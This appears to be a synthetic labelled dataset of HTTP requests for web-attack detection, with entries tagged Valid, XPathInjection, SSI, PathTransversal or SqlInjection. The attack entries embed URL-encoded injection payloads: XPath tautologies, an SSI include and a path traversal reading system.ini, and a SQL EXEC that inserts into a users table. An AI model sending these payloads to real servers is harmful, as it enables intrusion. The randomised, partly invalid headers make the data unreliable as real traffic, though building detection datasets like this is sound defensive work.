Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 254.171.174.88
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45193
Start - Id: 49834
class: XPathInjection
GET /XTrCl/5pOc8ArovearrLsGrooe/ZhZO44i8lrzM/iiso/rgdox9nmg0seaepqmsnh/9tdSqsns/Wolaxu/eoAoatds/eets5omekxuhi1.css?Oi97=a%3Flss&dsn3nsjaeyu=tveE%27+++++or+++++%28i+%3C+++count%28sa%2Fchild%3A%3Atext%28%29%29+++and+j+%3C++++count%28n1kwn%2Fchild%3A%3Acomment%28%29%29+++and+++k+++++%3C+++++count%28kf%2Fchild%3A%3A*%29++%29++++or+++%27oEa1nl%27+++%3D+%27+++ntts%27++++or&vukvV8B=at%3Bc+eojeUiAe5 HTTP/1.1
Host: www.mbeano.be:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 77.69.248.51
Cookie: kJOall=u shliurlaeelcd
Cookie2: $Version="7"
Date: Mon, 05 Mar 07 08:16:48 UTC
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: sgt9Obf=4tdadt
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sun, 04 Apr 10 16:47:53 CET
If-Unmodified-Since: Tue, 15 Aug 06 24:14:26 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 831
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Basic bW5yb25uNzplT2VkdGg=
Range: -16,498057-,69-3
Referer: http://hcaR.gov/grsegi.exe
TE: trailers
Trailer: Accept
User-Agent: yter7 (tIsL7.@Go; jL-f5L@kkO; s4Lm.mb; aAMcmb8; lslHSM0aH)
UA-CPU: Sparc
UA-Disp: 662,518,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: 8.9 125.86.207.55, HTTP/1.5 206.2.116.137
Transfer-Encoding: deflate
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 245 www.ameroeqh.js "imm4hes1ae" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49834
Start - Id: 40673
class: SSI
GET /bCxHevalZw820iinsertmRT/u5CNH42yC2i2YSeVlzzo/qtadnvcol/gnmW.YoMjf9M2E@S/rBZ6GRQTg/aAee/UlbgsoundhavingDlu/iaectr/tf2tL/gsrd.php3?onwuuevEj=%3C%21--++++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E HTTP/1.1
Host: www.s3enllMl.cz:80
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, euc-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 146.221.195.70
Cookie: jn0Tt=2475;iinmoCsel=eGdbocweo@a xp_eputa ;nt2h9ObhbIwaoi=49708;tpetsttonesjM=52589948;tdcsa1aumj1tmil=5758070
Cookie2: $Version="831"
Date: Fri, 27 Aug 04 06:08:22 CET
ETag: "@mxl29ew6yTgJ5nW"
Expect: 100-continue
From: taaslTl@7ntsatsanh.cz
If-Modified-Since: Fri, 20 Mar 09 08:23:22 UTC
If-Unmodified-Since: Mon, 14 Apr 08 15:48:29 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 05 May 05 20:20:48 CET
Max-Forwards: 09
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nc=a9ACEB75
Authorization: caorZo lawtSv=Isnes
Range: 266226-,-04
Referer: /zedza1/66Leetoe/arsxgr/wAsi.cfm
TE: chunked,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/5.3 (X11; U; Open BSD i386 0.1; mo-n0; rv:1.5.4) Gecko/24603908
UA-CPU: MIPS
UA-Disp: 155,8180,16
UA-OS: Windows 98
UA-Color: color8
Via: 4.1 162.74.80.124, HTTP/4.5 www.aiiAv.js:959
Transfer-Encoding: compress
Upgrade: m3ott/2.6
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 13811936519957
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40673
Start - Id: 4918
class: Valid
POST /cfWA93qZujKOEsW_/BlibLuN/em/n8c/gdEd/DmazYmisse4eRE0.jpg? HTTP/1.1
Content-Length: 234
Content-Language: bEtl,i
Content-Encoding: identity
Content-Location: http://iadrtta.com/bWnt/22eisgt.php3
Content-MD5: ZXVmZHhzdGpvZmlkbmZlVg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Apr 07 23:07:26 GMT
Last-Modified: Thu, 15 Apr 04 10:14:06 CET
Host: 243.83.162.206
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: gb2312, cp-950;q=0.4, iso-8859-8;q=0.7, iso-8859-3, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 47.100.65.174
Cookie: qEgohee=ac;6b=qa1delete7;hqL42inpImkiq=Tu nt;Hsdc=41488;niaysoiidtoulwc=9802995984;qldT29tqmr=3tdlIRtIejsrh5rfet
Cookie2: $Version="421"
Date: Fri, 19 Sep 08 19:25:59 GMT
ETag: W/"k3ZBJlp3z6SDXMh"
Expect: qmilots=drdk4toh
From: osuu@ioeO.org
If-Modified-Since: Thu, 12 May 05 23:32:33 UTC
If-Unmodified-Since: Sat, 03 Apr 04 09:15:27 CET
If-Match: *
If-None-Match: "LBSu2UMxN1Q8oo4RxX"
If-Range: Sat, 07 Feb 09 18:10:11 UTC
Max-Forwards: 39
MIME-Version: 8.8
Pragma: aeleatl=c
Proxy-Authorization: NTLM bmFmcmV0dHR6MWdBdHB0MXVyaWVpajhrZUVpdXQ1ZWNhZGsydQ==
Authorization: Basic ZW5lamU0YTprdHg1czU=
Range: 0401-,-401,485260-5
Referer: http://www.rnw82ie.ch/oInU8/ieceA1/stadlt.php3
TE: chunked;q=0.9
Trailer: Accept-Encoding
User-Agent: ihS9Ire http://www.p2lral.it
UA-CPU: 68000
UA-Disp: 979,352,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3012x434
Via: 6.0 www.auico.gif:81402, 4.1 www.gr1eSes.shtml
Transfer-Encoding: cean
Upgrade: dnb/4.0
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 246.105.179.180
X-Serial-Number: 074898
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rvIoctnT=ukX2zfld&olutOasjttaaere=hnedn6wt%teHyr&SetcKt-_=xe wmLcuh]biydt&oeFowqc0deoeB=sG.U0ch3QLK5&KuYcmnl9nj=r2@re&ssUho=Ho5am&4mcat5urile=tNRhX&ifauI=99734236&xespAn=2&3srdtIstnepidh=omar&rt5eavs7a=phpmo&ejnahncemr9=39830037

End - Id: 4918
Start - Id: 45776
class: PathTransversal
GET /olna16tisrayairAog.shtml?setsedb0ana=%5CWINDOWS%5Csystem.ini&UPz-=44883418&zl=t7iC&OI@QA=miEcuhtdb&9c=972680656&sckothegmiioel=25676&th=thhhorincludet7&6ef=90CFQyGTUhu&iPntam2nrs=8&AoY0P.nullwindow.open=948685&thsbn=twixosrds&n5maaotSalui=nluoN&timbhuiuety3oi4=63560&a6QQh=ht1gIC&uettet9=2754063974 HTTP/1.0
Host: www.terns.ch
Connection: close
Accept: application/*, image/gif, audio/basic;q=0.1
Accept-Charset: x-mac-ce, x-mac-arabic, x-mac-korean;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 79.240.194.64
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="9"
Date: Wed, 31 Mar 04 17:13:56 UTC
ETag: "o-Sve-wo4yNnUq.x7"
Expect: iinlwiyi=0scnai;nte9=ye1nacA4
From: a3y5m@itfi.st
If-Modified-Since: Thu, 21 Jan 10 23:48:41 GMT
If-Unmodified-Since: Fri, 30 May 08 15:08:07 GMT
If-Match: *
If-None-Match: "D8ZJiNloG2M0lLIgu"
If-Range: *
Max-Forwards: 091
MIME-Version: 2.4
Pragma: rOn='tywwyea'
Proxy-Authorization: nE0np rioae=tsisa
Authorization: Basic RThtbjpldDllZUl1aQ==
Range: 61230-1,22438-
Referer: http://www.sous.biz/e9lyle/bsr3ho.swf
TE: gzip
Trailer: Accept-Charset
User-Agent: Mozilla/6.0 (Machintosh; U; PPC 7.8; ih-ra; rv:2.6.3) Gecko/93901138
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3390x940
Via: 4.6 www.reectr.html:58555, 1.9 221.113.92.153, Us0hti/2.6 www.lws4rOA.jpeg
Transfer-Encoding: identity
Upgrade: 2na/4.7, nhstv/0.2, eb7/4.5, slNply/4.7
Warning: 712 www.oljITEeh.gif "uxn4he4amitIWjRw" "Sun, 25 Apr 04 03:24:53 GMT"
X-Forwarded-For: 46.216.57.172
X-Serial-Number: 726601184
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45776
Start - Id: 33019
class: Valid
POST /p.Y-gx/kxL@xKN0Inl/rla/m4n_fX@/2-@f7jH/eKhCRhzk-iI2gfSKV-/Et/KSWI0AxxWKUB/ipCFNriOGWTWxr/sDzHA-G@EI0tjN6Hk.css? HTTP/1.1
Content-Length: 58
Content-Language: uh,cac5,8hty
Content-Encoding: compress
Content-Location: http://odhDuta.de/NArtLu.nsf
Content-MD5: M2VyaXJDclBzZGNob2xUOA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Nov 04 06:17:14 UTC
Last-Modified: Thu, 21 Jan 10 14:37:56 UTC
Host: 198.121.166.215
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: gp-js7tnen, atdtwnhe-asroFne;q=0.1, r-esznar;q=0.7, nr8vyOj-eseazIn5;q=0.1, hatvezn-4eka;q=0.4
Cache-Control: max-stale
Client-ip: 36.212.245.152
Cookie: mtllgejro=0663;en8dubxsn=ala(c;th=OVn5i2emtsnN3srt;2oedrdhw4e=06;3jcmdXQwSFJP=nda|aettmpmocha@tcmd5ton
Cookie2: $Version="56"
Date: Tue, 02 Sep 08 06:49:57 GMT
ETag: W/"rHnwjd4MwLBr-ZVI2"
Expect: 100-continue
From: ehaaCtxw@5artje7.it
If-Modified-Since: Mon, 23 Nov 09 09:04:16 CET
If-Unmodified-Since: Sun, 13 Jul 08 04:16:08 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Sep 09 15:25:33 UTC
Max-Forwards: 9642
MIME-Version: 0.6
Pragma: heh377='ie3b'
Proxy-Authorization: 6sria rhhuu=Ewb9
Authorization: Basic YlNtc2g6aXJhZTdzZQ==
Range: 7-92465,94144-369,501461-
Referer: http://totu.be/aeewjaqh/eAeI/denj9o/aaesuuui/fstwno.mp3
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.6 (Windows; U; Win98 1.7; ny-1i; rv:5.4.3) Gecko/17075647
UA-CPU: x86
UA-Disp: 4878,467,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0187x7765
Via: IwatkE/6.5 76.94.51.179:4076
Transfer-Encoding: compress
Upgrade: trhg/2.1, seo/5.1, psppa/1.2
Warning: 229 3.87.67.188:155 "rolabuAsnlbse" "Mon, 12 Sep 05 12:07:12 GMT"
X-Forwarded-For: 92.249.204.222
X-Serial-Number: 131925
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dv=2ncs5tnhoeT)Hy&filsnil=n0)&zuSuarmn5hdeet=i&ziu=evd

End - Id: 33019
Start - Id: 17045
class: Valid
GET /dgg9anvmggronx/t9Zx9l0Y3NB-fQd2uG/doNlpo.aspx? HTTP/1.1
Host: www.aleu.fr
Connection: close
Accept: audio/*, text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: ehre=87svHy
Client-ip: 84.206.171.85
Cookie: Qrtp9C=965596995
Cookie2: $Version="495"
Date: Tue, 03 Feb 09 22:51:24 UTC
ETag: W/"2wojHnUF5dDWef1"
Expect: 100-continue
From: tmenntch@ntalrtr.be
If-Modified-Since: Wed, 14 Jan 09 09:24:52 GMT
If-Unmodified-Since: Sun, 10 Jan 10 03:13:49 CET
If-Match: *
If-None-Match: "K4FH4TviraUKU6dt"
If-Range: Mon, 12 Jan 09 01:55:59 CET
Max-Forwards: 9012
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRt4Eq"
Authorization: Digest qop=esat9n
Range: -8,76-,81611-3201
Referer: /ts5gtie/eKcIa3/iohiE9El/di0soosi/ssne9d.msf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/6.0 (X11; U; Solaris 7.1; Ta-k0; rv:7.8.5) Gecko/91736890
UA-CPU: PowerPC
UA-Disp: 7236,439,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3768x758
Via: HTTP/5.9 147.53.136.88:63
Transfer-Encoding: deflate
Upgrade: oiae/2.0, 2ohaei/3.7, Kead/8.1, tb5ex/6.1, hOAqi/1.3
Warning: 081 www.awrh.css "tsmF4p" "Sat, 07 Feb 09 11:32:07 GMT"
X-Forwarded-For: 146.223.240.130
X-Serial-Number: 88882390422538145
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17045
Start - Id: 49923
class: XPathInjection
GET /_qYc/2aoliatkia3/iiewwgwrlhneetresus/sygvQ@0BGa/tosd6hNlp/trnht8ibaroe4So/axfowhdfa/fZtkl9j/mzy5Ltw.msf?likexMfdsock_streamw1Fc=noe&EDEskrolwsnes=72156905&yGLgUWA72T=l+ue&ulhuqwpensnoaT=wDeZ&oteoileaLiOemi=ebiefi&jeaobal2cci2=%5B&huohldtnbOeJIRo=4MN&zI06glto4fdie=ulinkensmochaFols1ic%7C&se5xsf=5452+++++or++++1%3C++++haS%2Fium0%2FD3%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D43%5D++or+0463%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&o4daorbtbrtdui=x&utbbpau=uB1bOdbow2&0rd=5ilisndC0r HTTP/1.0
Host: www.i9ojdhp.uk
Connection: keep-alive
Accept: text/plain;q=0.0, image/*;q=0.5, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: T-P, syC-yhr
Cache-Control: no-store
Client-ip: 69.149.110.120
Cookie: lSg2ze=hrifedars;s0rE=88673994
Cookie2: $Version="455"
Date: Sun, 18 Jan 04 24:51:26 UTC
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: anuul0@opadyrcN.cz
If-Modified-Since: Sun, 04 Nov 07 11:22:48 GMT
If-Unmodified-Since: Sat, 09 Jan 10 12:25:30 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 22:25:22 GMT
Max-Forwards: 7
MIME-Version: 7.8
Pragma: gci=cj
Proxy-Authorization: Basic Z0lmcnFibGE6eHJ1ZXJvb24=
Authorization: besh 2agae=u9pira
Range: -3
Referer: http://www.nyae.be/ripe/tYxl/rljlro/Rleeet.wmn
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.5 (X11; U; Unix 4.2; of-il; rv:4.5.3) Gecko/27418429
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 5.1 249.51.174.127, 2.5 www.xoHhg8S.js
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 682 www.f0shh3eu.jpeg "tocdihgtUi" "Fri, 20 Feb 04 11:54:19 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49923
Start - Id: 31163
class: Valid
GET /rierenhoNwleey/entogirdsctTth/auNl_auJh761tHm2R1/k1bgsoundxrkmv/iyesGeAgeo/mqtAE0jJ9EY.jsp?oeicnycaaaTg=o0Busr&noeho8pNebh=dchevalt&eiuUMtIdae=%3C%3Aaccess_log&mail8M2fHBe6=%3F0d%26zrn%3Dvfepe0eausr+ts&ci=54&ooworR=y1D7d&qs9ety=eiA4ee2eoaewInuXin&oApGVYY=nsceSpe+iikes7ornr%25&where2AdtmphttpI-9@_X=5402807&icsiiditcdEtet2=O%24&5L2aapagwhlmsmh=uF.x10T3&iee5iuere=7559 HTTP/1.1
Host: www.ee4d.uk:80
Connection: SmEeIel
Accept: audio/*
Accept-Charset: *
Accept-Encoding: compress;q=0.1, compress, deflate;q=0.8, deflate
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 51.225.232.42
Cookie: 5roR=g2s;eeaCdarcOjh=h>0adi
Cookie2: $Version="406"
Date: Sun, 04 Oct 09 12:38:15 GMT
ETag: W/"Kl07z01Q5Zq@nnfKDGV"
Expect: Lawidtvm
From: rfswrMa@zclaopvei.org
If-Modified-Since: Fri, 11 Jun 04 16:14:57 CET
If-Unmodified-Since: Wed, 31 Oct 07 23:24:28 CET
If-Match: "vtw2tb2bSU8ksEOKTpw"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM dWFtZGhobm9sZXd0b3U3Z2dvd3RzNWVyaDREZW9jZHlydHN0VThucg==
Authorization: Basic Ym50b29xbHI6dGlzbWx0SG8=
Range: 41-,7530-978
Referer: http://www.rnash.uk/icpoc/d7An0/kptNuo/cTadi8it/parh.mpg
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.0 (X11; U; Open BSD i386 4.6; re-lm; rv:9.6.5) Gecko/27318537
UA-CPU: StrongARM
UA-Disp: 342,300,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9527x780
Via: 2.9 www.omeel.js, sAe/7.4 www.akIem.png:5708, 9.4 www.mb1a.html:648
Transfer-Encoding: deflate
Upgrade: Lr9lei/6.9, imH4t/7.3
Warning: 383 www.hopglae.jpg "ewaw3e4reMl" 
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 1704318559609
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31163
Start - Id: 35274
class: SqlInjection
GET /aHQlNwETXWm/nmluqIFFdnFGZiIs/bkK3M6X/uEQr6E/ERZRNpinJrs/wspNettt/rlrnrtxeAo1/ngMM/m2hbJGlogfY/zB@NIpsWxtermGJBl/Cpmdii.jpeg?eexry=ej%3Cediv&zraeTn=%3B+++EXEC%28+%27INS%27%2B%27ERT+++++INTO++users++++values%284%2C%27a0%27%2C%273psae%27+++%29%29&Fnu=ap6&MqCdr74sueU=8398817&eaeDhienTpiR=nl%3CstofdX%2Fvh&x3hvvY=14&o6bi=21955&niveihjrcheAtW=ud8&tf9olQstdnxI=46067&ecsesEnershmlw=atIru+ftrestc5v&HK3T5_w68cl=yeA HTTP/1.0
Host: www.rtntWel0t.org
Connection: wx92ht2e
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=913
Client-ip: 155.132.155.102
Cookie: r2n4nhentRrreno=<1kcopy;yrbrdse0snno=qOIadlI1y50E
Cookie2: $Version="75"
Date: Sat, 28 Aug 04 24:34:38 CET
ETag: "bvEbhRuWJy1AnSCQb"
Expect: 100-continue
From: B9ir@tOlwn.gov
If-Modified-Since: Sun, 08 Jan 06 18:15:37 UTC
If-Unmodified-Since: Tue, 05 Sep 06 22:00:36 CET
If-Match: ".M9tQIMHGSKPZ0v"
If-None-Match: "M@lM3Gui-xmWYKigQ"
If-Range: Mon, 20 Jun 05 07:39:40 GMT
Max-Forwards: 27
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: /gpexH.png
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.9 (Machintosh; U; PPC Mac OS X 5.2; yb-ea; rv:8.8.4) Gecko/65223985
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: FTP/7.5 www.ac1art.jpeg, FTP/4.7 www.rancoo.shtml
Transfer-Encoding: identity
Upgrade: p0emTn/7.1, nmstn/3.3
Warning: 296 6.5.179.123 "hytu1eutoy" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 35274
Start - Id: 15810
class: Valid
GET /eeo9ceth/dwpJEwNzBZ31JOHK/n55N3yy/sanhresiSi3ssoDee/agmCsnhowet.htm?YIBdYWqXM=i7dbe3natuEthiudie HTTP/1.0
Host: 72.203.87.147
Connection: close
Accept: */*;q=0.8
Accept-Charset: euc-cn, x-mac-ce, windows-1258, x-mac-japanese
Accept-Encoding: identity;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 204.119.108.46
Cookie: ctam0vogu0t1kui=46583
Cookie2: $Version="1"
Date: Fri, 10 Jun 05 12:59:32 UTC
ETag: W/"4g.i8cxBwn8B1MSmy"
Expect: 100-continue
From: nsmr@ahaei.uk
If-Modified-Since: Wed, 05 Oct 05 16:01:19 GMT
If-Unmodified-Since: Fri, 18 Aug 06 08:30:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Sep 05 04:11:23 UTC
Max-Forwards: 62
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest username="0nSl"
Authorization: Digest qop=yMwzne
Range: -0,-3358,3280-395
Referer: /ithfETto/idlEu/tn5icsqh.png
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: 9pelftC4lo7ihLwnT
UA-CPU: StrongARM
UA-Disp: 3907,1004,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 132x8371
Via: FTP/5.7 www.Jodw6.js, 2.8 126.33.125.169:78068
Transfer-Encoding: compress
Upgrade: iercSi/3.4, rnry/0.4, onpiw/4.8, bhtr/3.8
Warning: 193 www.losl.png "jmxogwrexo6" 
X-Forwarded-For: 82.201.200.90
X-Serial-Number: 711196444045692
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15810
Start - Id: 48668
class: XPathInjection
POST /2imdoJs.E/iWYsFEcmyR7r922N/harlEl/hfp1ipaSaR.html? HTTP/1.1
Content-Length: 322
Content-Language: nc
Content-Encoding: compress
Content-Location: http://gatu.ch/Ohsette/ageh8yyf/tnbelkrZ/6syiwh.css
Content-MD5: c3A3ZWluVDN1ZWdpQW1tdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Wed, 14 Dec 05 16:26:41 CET
Host: www.etgEl.uk:80
Connection: roeui
Accept: */*;q=0.7
Accept-Charset: iso-8859-6, koi8, x-mac-arabic;q=0.6, x-mac-arabic, windows-1255
Accept-Encoding: identity;q=0.8, identity, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 94.68.181.174
Cookie: safeenaii=85801;no4qt=032984;1ojoyp='8;0at4ae=]eelL>eMaac;snh5ou=tLCN3r8wM
Cookie2: $Version="97"
Date: Sat, 16 May 09 22:38:11 UTC
ETag: W/"rOBiqjbhOHqjJpd"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Fri, 29 Jun 07 23:44:19 CET
If-Match: *
If-None-Match: *
If-Range: "Dq@hqaIle13M7L2QGj@-"
Max-Forwards: 810
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM cXRpQWFnd2NlemgwdjBhZXNsaWRzc3NvZWV0MmVveW5sbg==
Authorization: ugdnw pugF=iytalt
Range: 12-
Referer: http://www.mcaQa.st/bcutti0/Sfihiasg.php4
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.2 (compatible; Konqueror/3.0; Win 9x; Onvr)
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 5.7 www.5cldeueu.shtml
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 105.28.18.229
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

wqtNs=a7OakiTe2einl1&dwxtsst=7118688575&eval-kcC=d33Gn6gk&aa1ilrhfstie9eo=m&m 1l4ylc+rr3&qHwhereerx-4execti=rflaitrrh&tsdavOS=aenDS'   or     6   <    count(path/child::*)     or 'wnleosje'   = '&eEtdigosnbaN=i4wc6Q&keirouvn9a=ae:e:vLto95&I4_1jMWe=tR6L74IR&nrJqaapaccndcat=om@ik&n7p=:(i

End - Id: 48668
Start - Id: 21315
class: Valid
GET /e5Yfi1QDIIG@gIHhev-h/dh_Lvn1fQ02TO/4teVKhC-9CI6mhome/dg.VSEvP6IV0-hMZ/iclN06adriwEen7rf/mhUSfC7GWDkG9/dKWh4bZUTfq5.gif?CznAber=s2ETf%40aQ&ibt3oaeg7rsr=5&one=7&TbXhtaccesiVow=290 HTTP/1.1
Host: www.maye7m3ne.biz:69634
Connection: close
Accept: application/x-tar, text/plain, audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: ehoodk-dn, If-ocLne
Cache-Control: no-cache
Client-ip: 141.197.254.45
Cookie: ebwzeb1o=+e;s8dpe5e=12Hslr
Cookie2: $Version="961"
Date: Tue, 23 May 06 15:00:42 CET
ETag: W/".-8ayjOdgmzKDbZki"
Expect: erdoHdf3=esho
From: 3toI@brgto.it
If-Modified-Since: Tue, 12 Sep 06 12:07:52 GMT
If-Unmodified-Since: Sun, 21 Sep 08 14:42:08 GMT
If-Match: *
If-None-Match: "Al@SE_s1vPUXXDznO"
If-Range: Fri, 20 Jan 06 06:53:33 UTC
Max-Forwards: 3
MIME-Version: 1.5
Pragma: ltic='liar5oie'
Proxy-Authorization: Digest opaque="o6eeA"
Authorization: Basic cnJoZTpudG9ibGE=
Range: 863-
Referer: http://rnatalNo.com/bpaenu/uEeneraa/eemlHoyn/2efplaY.css
TE: gzip,gzip;q=0.8,gzip
Trailer: Trailer
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 8.8; gi-ni; rv:5.4.7) Gecko/76041402
UA-CPU: PowerPC
UA-Disp: 406,021,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6998x4175
Via: FTP/5.9 223.48.99.80:46, 2.4 72.202.145.209
Transfer-Encoding: qsdg
Upgrade: tymurm/5.9, hhlRo/9.6, b96s/9.5
Warning: 371 www.eesb7.jpeg "lhwt" "Wed, 24 Sep 08 21:43:43 GMT"
X-Forwarded-For: 8.50.17.22
X-Serial-Number: 2418413
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21315
Start - Id: 18839
class: Valid
GET /aeiSexe8fdrduwhr/rnltltudltf/nAa1o9c4SAo0hij9rm/fV1sz_mhNtVhLA3QLJkW/sCcQgI_@l/sLtIC3OuhPw3nZ8Ovag/jsbfYYUNv/ytthft/7Xt@q6IHl/pFXysone.nsf?idropX0ot_UsystemS@=vgsty&ygrgephoHtiksi=9456274&tnsog=fO95_jum&sk7doa=onio%27btTycn&VU3u=of&nemiosRs=nMHA&a6es2Wo2rv3zohy=%2BtrMo&ychsnjdbrdUseqE=9qo8Ug-Kw7&ren=56515&ent=eadmin&oice=aeAeonepugnmih0do&yrdwsystemYH3=8721&tASsne4mt=seush9asSken HTTP/1.1
Host: 77.52.189.170:7272
Connection: close
Accept: video/*, text/*, audio/x-wav
Accept-Charset: x-mac-hebrew, iso-8859-5;q=0.4, iso-8859-2, iso-8859-9;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 208.166.219.41
Cookie: 3a=899
Cookie2: $Version="84"
Date: Sun, 14 Aug 05 03:10:03 CET
ETag: W/"FfhxfqFGS02zMiOb"
Expect: 100-continue
From: oiir0@raaeopgcl.it
If-Modified-Since: Thu, 17 Dec 09 08:36:04 UTC
If-Unmodified-Since: Wed, 08 Apr 09 13:25:13 CET
If-Match: *
If-None-Match: "y7zXq0mYraxlAe2"
If-Range: *
Max-Forwards: 53
MIME-Version: 9.5
Pragma: ii=Eeagee
Proxy-Authorization: nrIw tamndt8e=itrl
Authorization: NTLM N3g5RWdmcnRucjNlbmF0aWUxNWxuc3B1ZXJFeDdDdWR1RWFybjFldXdlZXRtanI=
Range: -9,1224-02
Referer: /unuzt/aAdaS/2Aelee8d/uueaa.html
TE: trailers,trailers
Trailer: Accept
User-Agent: schpi (aCEEC0W.2N; zZvduq4OuI; te-5Q8.Yu; sEJEn6w; 1XtI7@)
UA-CPU: MIPS
UA-Disp: 788,1566,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2376x8658
Via: 3.7 8.171.215.217
Transfer-Encoding: fe4cn
Upgrade: q6os/7.0, ezs/8.2
